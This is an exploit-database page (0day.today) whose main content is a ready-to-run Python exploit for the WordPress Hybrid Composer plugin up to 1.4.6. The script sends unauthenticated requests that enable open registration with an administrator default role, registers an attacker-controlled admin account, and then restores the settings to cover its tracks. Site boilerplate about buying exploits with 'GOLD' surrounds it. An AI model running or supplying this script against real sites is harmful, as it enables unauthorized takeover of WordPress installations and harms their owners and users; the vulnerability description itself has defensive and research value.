0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WordPress Hybrid Composer 1.4.6 Plugin - Improper Access Restrictions Exploit
# Exploit Title: Wordpress Hybrid Composer <= 1.4.6 - Unauthenticated Configuration Access (Admin Takeover) # Vendor Homepage: http://wordpress.framework-y.com # Software Link: http://wordpress.framework-y.com/hybrid-composer/ # Reference: https://labs.sucuri.net/wptf-hybrid-composer-unauthenticated-arbitrary-options-update/, https://wpvulndb.com/vulnerabilities/9452 # Affected version: <= 1.4.6 # Researcher: rootetsy # Exploit Author: yasin # Tested on: Linux # Vulnerability discovered by rootetsy # Summary The plugin Hybrid Composer allows unauthenticated users to update any option in the options database table. # Description A Hybrid Composer plugin enables API routes by registering actions with either wp_ajax_ for authenticated or wp_ajax_nopriv_ for unauthenticated calls. Plugins using wp_ajax_nopriv_ actions should be fine as long as they are not giving access to methods with critical functionalities. index.php in the WPTF Hybrid Composer plugin prior 1.4.7 for WordPress has an Unauthenticated Settings Change Vulnerability, related to certain wp_ajax_nopriv_ usage. Anyone can change the plugin's setting by simply sending a request with a hc_ajax_save_option action. # Usage: python exploit.py ########################################################### import httplib, urllib import sys import random # pip install httplib urllib random site = raw_input("[+] Target: ") url = "/wp-admin/admin-ajax.php" username = "user-%d" % random.randrange(1000000, 3000000) email = raw_input("[+] E-mail: ") def ChangeOption(site, url, option_name, content): params = urllib.urlencode({'action': 'hc_ajax_save_option', 'option_name': option_name, 'content': content}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site) conn.request("POST", url, params, headers) response = conn.getresponse() data = response.read() conn.close() registration_url= "/wp-login.php" def AdminTakeover(site, registration_url, user_login, user_email): params = urllib.urlencode({'action': 'register', 'user_login': user_login, 'user_email': user_email}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} conn = httplib.HTTPSConnection(site) # conn = httplib.HTTPConnection(site) conn.request("POST", registration_url, params, headers) response = conn.getresponse() data = response.read() conn.close() ChangeOption(site, url, "users_can_register", "1") ChangeOption(site, url, "default_role", "administrator") print "[+] Registering new admin user" AdminTakeover(site, registration_url, username, email) print "[+] Check your email for password: " + username + "[" + email + "]" ChangeOption(site, url, "users_can_register", "0") ChangeOption(site, url, "default_role", "subscriber") ########################################################### # 0day.today [2024-11-15] #